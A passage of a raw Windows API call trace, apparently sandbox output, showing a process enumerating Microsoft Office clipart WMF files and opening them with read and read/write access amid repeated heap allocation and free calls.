dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0102.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.211] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38cc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD09194_.WMF", cAlternateFileName="")) returned 1 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0102.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0102.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0102.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0102.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0102.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.212] AreFileApisANSI () returned 1 [0102.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0102.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0102.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0102.212] AreFileApisANSI () returned 1 [0102.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0102.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 69 [0102.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.214] GetFileType (hFile=0x33c) returned 0x1 [0102.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.214] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.214] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.214] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.214] CloseHandle (hObject=0x33c) returned 1 [0102.214] AreFileApisANSI () returned 1 [0102.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 69 [0102.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.215] GetFileType (hFile=0x33c) returned 0x1 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.215] CloseHandle (hObject=0x33c) returned 1 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.216] AreFileApisANSI () returned 1 [0102.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0102.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 69 [0102.216] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38cc)) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0102.216] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.216] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.216] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x504a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD09662_.WMF", cAlternateFileName="")) returned 1 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0102.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0102.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.217] AreFileApisANSI () returned 1 [0102.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0102.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.218] AreFileApisANSI () returned 1 [0102.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0102.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 69 [0102.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.218] GetFileType (hFile=0x33c) returned 0x1 [0102.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0102.218] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.218] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.218] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.219] CloseHandle (hObject=0x33c) returned 1 [0102.219] AreFileApisANSI () returned 1 [0102.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0102.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 69 [0102.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.219] GetFileType (hFile=0x33c) returned 0x1 [0102.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0102.219] CloseHandle (hObject=0x33c) returned 1 [0102.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 